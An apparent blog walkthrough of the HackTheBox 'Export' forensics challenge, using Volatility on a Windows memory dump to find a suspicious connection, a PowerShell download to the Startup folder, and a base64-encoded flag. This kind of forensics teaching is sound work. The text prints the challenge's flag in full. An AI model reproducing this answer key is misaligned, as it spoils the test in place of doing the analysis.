We spotted a suspicious connection to one of our servers, and immediately took a memory dump. Can you figure out what the attackers were up to?
Information
Challenge: Export
Category: Forensics
Difficulty: Easy
Files : Export.zip 138 MB
– WIN-LQS146OE2S1-20201027-142607.raw 512 MB
Environment: Remnux VM
My Recommendations
Download it from hackthebox and verify it with:
sha256sum /path/to/Export.zipSHA256SUM: 0ea5363cd1ee973de4f5d1853f4dd04a8d25f1e701e34100e0e702fb85db1796
Walkthrough
1. Memory Analysis
First, we need to find the correct Volatility profile for this memory dump:
vol.py -f WIN-LQS146OE2S1-20201027-142607.raw imageinfo
Usually the first one works:
Next, we can check the connections and try to find which one is suspicious:
vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile=Win7SP1x64 netscan
I’m going to assume that this is the attacker’s/suspicious IP in question. However, it’s all speculation, so we can move on to another plugin, such as cmdline:
vol.py -f WIN-LQS146OE2S1-20201027-142607.raw --profile=Win7SP1x64 cmdline
Here we can se that a PowerShell script was Downloaded to the Start up directory. We can decode the URL, which results into the following:
The link contains a base64 encoded string… which decodes to:
echo -n 'SFRCe1cxTmQwd3NfZjByM05zMUNTXzNIP30=' | base64 -d
#HTB{W1Nd0ws_f0r3Ns1CS_3H?}
Flag: HTB{W1Nd0ws_f0r3Ns1CS_3H?}
TLDR
– A straightforward memory forensics challenge.
– Use volatility2 to find IOCs & decode the flag.
